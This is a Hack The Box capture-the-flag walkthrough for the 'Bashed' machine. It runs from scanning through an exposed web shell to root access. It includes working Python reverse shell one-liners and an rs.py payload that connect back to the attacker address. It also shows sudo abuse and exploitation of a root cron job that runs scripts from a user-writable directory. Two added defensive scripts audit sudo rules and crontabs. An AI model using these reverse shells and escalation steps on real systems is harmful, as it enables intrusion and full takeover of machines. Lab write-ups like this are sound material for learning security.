Bashed
Ports scan
root@kali:~/HTB/Machines/Bashed# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.68 --rate=1000

Starting masscan 1.0.5 at 2019-11-25 18:16:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.68
nmap
root@kali:~/HTB/Machines/Bashed# nmap -A -T4 -v 10.10.10.68

Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 13:16 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating Ping Scan at 13:16
Scanning 10.10.10.68 [4 ports]
Completed Ping Scan at 13:16, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:16
Scanning bashed.htb (10.10.10.68) [1000 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed SYN Stealth Scan at 13:16, 0.71s elapsed (1000 total ports)
Initiating Service scan at 13:16
Scanning 1 service on bashed.htb (10.10.10.68)
Completed Service scan at 13:16, 6.10s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against bashed.htb (10.10.10.68)
Retrying OS detection (try #2) against bashed.htb (10.10.10.68)
adjust_timeouts2: packet supposedly had rtt of -208236 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208236 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258312 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258312 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258301 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258301 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258392 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258392 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258426 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258426 microseconds.  Ignoring time.
Initiating Traceroute at 13:16
Completed Traceroute at 13:16, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:16
Completed Parallel DNS resolution of 2 hosts. at 13:16, 0.19s elapsed
NSE: Script scanning 10.10.10.68.
Initiating NSE at 13:16
Completed NSE at 13:17, 0.96s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.18s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.044s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Aggressive OS guesses: Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), Linux 3.2 - 4.9 (94%), Linux 4.4 (94%), Linux 4.8 (94%), Linux 4.9 (94%), Linux 3.8 - 3.11 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Mon Nov 25 13:16:32 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   42.82 ms 10.10.14.1
2   43.06 ms bashed.htb (10.10.10.68)

NSE: Script Post-scanning.
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
           Raw packets sent: 1116 (54.156KB) | Rcvd: 2725 (111.328KB)

Both scans agree: the only exposed service is HTTP on port 80, served by Apache 2.4.18 on Ubuntu. The whole attack surface is the web application.
Web Enumeration
root@kali:~/HTB/Machines/Bashed# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.68

dirsearch v0.3.8

Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_13-23-23.log

Target: http://10.10.10.68

[13:23:23] Starting:
[13:23:24] 403 -  290B - /.php
[13:23:24] 200 -    2KB - /images/
[13:23:24] 403 -  292B - /icons/
[13:23:24] 200 -   14B - /uploads/
[13:23:25] 200 -  939B - /php/
[13:23:26] 200 -    2KB - /css/
[13:23:31] 200 -    1KB - /dev/
[13:23:31] 200 -    3KB - /js/
[13:23:35] 200 -    0B - /config.php
[13:23:42] 200 -    2KB - /fonts/
[13:30:06] 403 -  300B - /server-status/

Task Completed
Phpbash.php
The /dev/ directory found above is listable and contains phpbash.php, a PHP web shell that executes commands on the server as the web server user (www-data). We can use it directly from the browser, or use it to launch a reverse shell to get a more usable terminal.
Open a listener
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Launch the reverse shell from the web shell
From the web shell at http://10.10.10.68/dev/phpbash.php, run the following command (10.10.14.34 is the attacker's tun0 address; replace it with yours):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The listener receives the shell. The raw /bin/sh has no TTY, so upgrade it: spawn a PTY with Python, background nc, fix the local terminal with stty, and bring it back.
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:45076.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/var/www/html/php$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nlvp 4444
root@kali:~/HTB/Machines/Bashed# stty rows 24 columns 80
root@kali:~/HTB/Machines/Bashed# stty raw -echo
root@kali:~/HTB/Machines/Bashed# fg
rlwrap nc -nlvp 4444
www-data@bashed:/var/www/html/php$ export TERM=screen
User Flag
From the reverse shell or from the web shell, the user flag is readable: arrexel's home directory is world-readable, so www-data can read user.txt without any escalation.
www-data@bashed:/var/www/html/dev# cd /home
www-data@bashed:/home# ls
arrexel
scriptmanager
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# cat user.txt
<USER_FLAG>
Privilege escalation enumeration
Open a web server
root@kali:~/HTB/Machines/Bashed# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
From the reverse shell or the web shell, fetch the script into /tmp, make it executable and run it:
www-data@bashed:/tmp# wget -q http://10.10.14.34/LinEnum.sh
www-data@bashed:/tmp# chmod 755 LinEnum.sh
www-data@bashed:/tmp# ./LinEnum.sh
Several items in the report matter:
- User 1001: uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
- User 1000: uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare). arrexel is in the adm and sudo groups.
- User www-data can sudo to scriptmanager without a password:
We can sudo without supplying a password!
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
- Home directory permissions are lax (we already knew it, since www-data could read the user flag).
- A crontab for root exists. www-data cannot stat the entries of /var/spool/cron/crontabs (hence the ? fields), but the listing shows a file named root, so root has a personal crontab:
[-] Anything interesting in /var/spool/cron/crontabs:
total 0
d????????? ? ? ? ? ?            .
d????????? ? ? ? ? ?            ..
-????????? ? ? ? ? ?            root
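The sudo -l output above is the pivot for the whole lateral move, and it is worth being able to parse it mechanically rather than eyeballing it. The script below is an added example for this write-up (not code from the original page or from sudo): it parses the listing format "(runas_user : runas_group) TAG: command", flags rules that hand an account over outright (ALL with NOPASSWD), and builds the sudo -u invocation used later on this page. The sample text is constructed from the LinEnum output on Bashed plus one invented rule for contrast; the rule regex is an assumption that covers the common listing format, not sudo's full grammar.

```python
"""Parse `sudo -l` output and flag rules that hand an account over without a password.

Added example for this write-up, not part of the original page or of sudo itself.
The rule grammar below is an assumption covering the common listing format
"(runas_user : runas_group) TAG: command".
"""
import re
from typing import List, NamedTuple, Optional


class SudoRule(NamedTuple):
    runas_user: str
    runas_group: Optional[str]
    nopasswd: bool
    command: str


# Constructed sample: the first rule is the real one from the Bashed enumeration,
# the second is invented to show a rule that is not an immediate takeover.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/less /var/log/syslog
"""

# "(user : group)" or "(user)", optional tags such as "NOPASSWD:" or "SETENV:", then the command.
RULE = re.compile(
    r"^\((?P<user>[^):\s]+)(?:\s*:\s*(?P<group>[^)\s]+))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Return the rules listed after the 'User X may run the following commands' line."""
    rules: List[SudoRule] = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # still inside the Defaults block
        m = RULE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        rules.append(SudoRule(m.group("user"), m.group("group"),
                              "NOPASSWD" in tags, m.group("cmd").strip()))
    return rules


def takeover_rules(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that give a whole account away: any command, no password asked."""
    return [r for r in rules if r.command == "ALL" and r.nopasswd]


def sudo_invocation(rule: SudoRule, command: str) -> str:
    """Build the sudo line that runs `command` under the rule (as -u scriptmanager on Bashed)."""
    parts = ["sudo", "-u", rule.runas_user]
    if rule.runas_group and rule.runas_group != rule.runas_user:
        parts += ["-g", rule.runas_group]
    return " ".join(parts + [command])


if __name__ == "__main__":
    for rule in takeover_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("takeover:", rule, "->", sudo_invocation(rule, "/bin/bash"))
```

Feeding it the real output of `sudo -l` on a target gives the same (scriptmanager, NOPASSWD, ALL) finding that LinEnum printed above; a rule with a specific binary and no NOPASSWD tag, like the invented second line, is reported as parsed but not as a takeover.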
Lateral escalation
www-data can run any command as scriptmanager through sudo, without a password.
List scriptmanager files
www-data@bashed:/tmp$ find / -user scriptmanager 2>/dev/null
/scripts
/home/scriptmanager
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.nano
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
The interesting entry is /scripts, a directory outside any home. As scriptmanager we can list it:
www-data@bashed:/tmp$ sudo -u scriptmanager ls -l /scripts/
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Nov 25 11:05 test.txt
We can read the content of the script test.py:
www-data@bashed:/tmp$ sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
The script is very simple: it opens test.txt (relative to the current directory) for writing and writes "testing 123!". Yet /scripts/test.txt is owned by root and was last written today (Nov 25 11:05), while test.py itself belongs to scriptmanager. Something running as root is executing scriptmanager's script.
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager python /scripts/test.py
Traceback (most recent call last):
File "/scripts/test.py", line 1, in <module>
f = open("test.txt", "w")
IOError: [Errno 13] Permission denied: 'test.txt'
As expected, running the script as scriptmanager fails: the relative path test.txt resolves to the current directory (/var/www/html/dev here), where scriptmanager cannot write, and even inside /scripts the existing test.txt is root-owned with mode 644. Only root can produce the file we observed.
Open a reverse shell
Technically we could keep working as www-data and prefix every command with sudo -u scriptmanager, but it is more comfortable to open a second shell directly as scriptmanager.
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
From web shell or reverse shell
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And the listener receives a new shell, this time as scriptmanager:
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:37152.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
scriptmanager
$ python -c 'import pty; pty.spawn("/bin/bash")'
scriptmanager@bashed:/var/www/html/dev$ export TERM=screen
User escalation
test.txt is owned by root, and LinEnum told us that root has a crontab. We can guess that a periodic task runs the script as root. We cannot read root's crontab as www-data or scriptmanager, but pspy lets us watch the processes cron spawns without any privileges.
Run pspy
root@kali:~/HTB/Machines/Bashed# wget -q https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
Make sure our web server is still up:
root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.68 - - [25/Nov/2019 22:30:25] "GET /LinEnum.sh HTTP/1.1" 200 -
From the www-data console
www-data@bashed:/tmp$ wget -q http://10.10.14.34/pspy32
www-data@bashed:/tmp$ chmod +x pspy32
www-data@bashed:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2019/11/25 19:35:42 CMD: UID=0    PID=99     |
2019/11/25 19:35:42 CMD: UID=0    PID=98     |
2019/11/25 19:35:42 CMD: UID=0    PID=94     |
...
2019/11/25 19:35:42 CMD: UID=0    PID=100    |
2019/11/25 19:35:42 CMD: UID=0    PID=10     |
2019/11/25 19:35:42 CMD: UID=0    PID=1      | /sbin/init noprompt
2019/11/25 19:36:01 CMD: UID=0    PID=895    | /usr/sbin/CRON -f
2019/11/25 19:36:01 CMD: UID=0    PID=897    | python test.py
2019/11/25 19:36:01 CMD: UID=0    PID=896    | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
At 19:36:01 cron (UID=0) ran `cd /scripts; for f in *.py; do python "$f"; done`: every file with a .py extension in /scripts is executed as root. Since /scripts is owned by scriptmanager, and we can write there as scriptmanager, any Python file we drop into that directory will run as root on the next cron run. The root cause is a privileged job executing code from a directory a lower-privileged user controls.
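The same misconfiguration is easy to miss in a crontab review, so here is a small audit, added for this write-up and not part of the original page or of any tool the page uses. It parses crontab lines, pulls out the directories each command runs from or touches, and flags those that a non-root user can write to (non-root owner, world-writable, or group-writable by a non-root group). The crontab and the ownership table are constructed samples (the first job is the one pspy revealed above); the path-extraction regex is a deliberately simple assumption.

```python
"""Audit crontab commands for directories a non-root user can write to.

Added example for this write-up, not code from the original page. It models the
root cause on Bashed: root's cron runs every *.py in /scripts, but /scripts belongs
to scriptmanager, so whoever writes there runs code as root. Ownership and modes are
supplied as a constructed table (what `ls -ld` would show) so the script runs offline.
"""
import re
import stat
from typing import Dict, Iterator, List, NamedTuple, Tuple


class DirInfo(NamedTuple):
    owner: str
    group: str
    mode: int  # permission bits as stat.S_IMODE would return them


# Constructed filesystem snapshot; /scripts mirrors the listing seen on Bashed.
SAMPLE_FS: Dict[str, DirInfo] = {
    "/scripts": DirInfo("scriptmanager", "scriptmanager", 0o755),
    "/usr/local/bin": DirInfo("root", "root", 0o755),
    "/tmp": DirInfo("root", "root", 0o1777),
}

# Constructed crontab; the first job is the one pspy revealed on Bashed.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * cd /scripts; for f in *.py; do python "$f"; done
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * cd /tmp && ./cleanup.py
"""

# An absolute path not glued to a preceding path character (so "./x" is not matched).
ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def parse_crontab(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (schedule, command) for each job line; comments and blanks are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield " ".join(parts[:5]), parts[5]


def referenced_dirs(command: str, fs: Dict[str, DirInfo]) -> List[str]:
    """Directories the command uses: a known dir named directly, or the parent of a file path."""
    found = set()
    for path in ABS_PATH.findall(command):
        if path in fs:
            found.add(path)
        else:
            parent = path.rsplit("/", 1)[0] or "/"
            if parent in fs:
                found.add(parent)
    return sorted(found)


def writable_by_non_root(info: DirInfo) -> bool:
    """True if an unprivileged user could drop or replace files in the directory.

    The sticky bit on /tmp-style dirs does not help: it stops deleting other users'
    files, not creating a new one that a root job will later execute.
    """
    if info.owner != "root":
        return True
    if info.mode & stat.S_IWOTH:
        return True
    return bool(info.mode & stat.S_IWGRP) and info.group != "root"


def audit(crontab_text: str, fs: Dict[str, DirInfo]) -> List[Tuple[str, str, str]]:
    """Return (directory, owner, command) for every job that runs out of a risky directory."""
    findings = []
    for _schedule, command in parse_crontab(crontab_text):
        for d in referenced_dirs(command, fs):
            if writable_by_non_root(fs[d]):
                findings.append((d, fs[d].owner, command))
    return findings


if __name__ == "__main__":
    for directory, owner, command in audit(SAMPLE_CRONTAB, SAMPLE_FS):
        print(f"{directory} (owner {owner}) is used by a root job: {command}")
```

On the sample data the audit reports /scripts (owned by scriptmanager) and /tmp (world-writable), and clears /usr/local/bin. On a real host the table would be filled from os.stat on each directory; the fix for the flagged case is the same either way: root jobs must only execute files from root-owned, non-writable directories, or the job must run as the user who owns the scripts.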
Run listener
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Create python reverse shell script
root@kali:~/HTB/Machines/Bashed# cat rs.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.34",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Upload rs.py to the /scripts folder
Make sure our web server is still up:
root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.68 - - [25/Nov/2019 22:30:25] "GET /LinEnum.sh HTTP/1.1" 200 -
10.10.10.68 - - [25/Nov/2019 22:34:47] "GET /pspy32 HTTP/1.1" 200 -
From scriptmanager console
scriptmanager@bashed:/var/www/html/dev$ cd /scripts
scriptmanager@bashed:/scripts$ wget -q http://10.10.14.34/rs.py
Wait for the next run of the cron job: the loop picks up rs.py along with test.py and runs it as root, and the listener receives a root shell. Remove rs.py from /scripts once done, otherwise every subsequent cron run will spawn another connection back to the listener.
root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:47616.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python -c 'import pty; pty.spawn("/bin/bash")'
scriptmanager@bashed:/var/www/html/dev$ export TERM=screen
Root Flag
# cat /root/root.txt
<ROOT_FLAG>
Daniel Simao 20:53, 25 November 2019 (EST)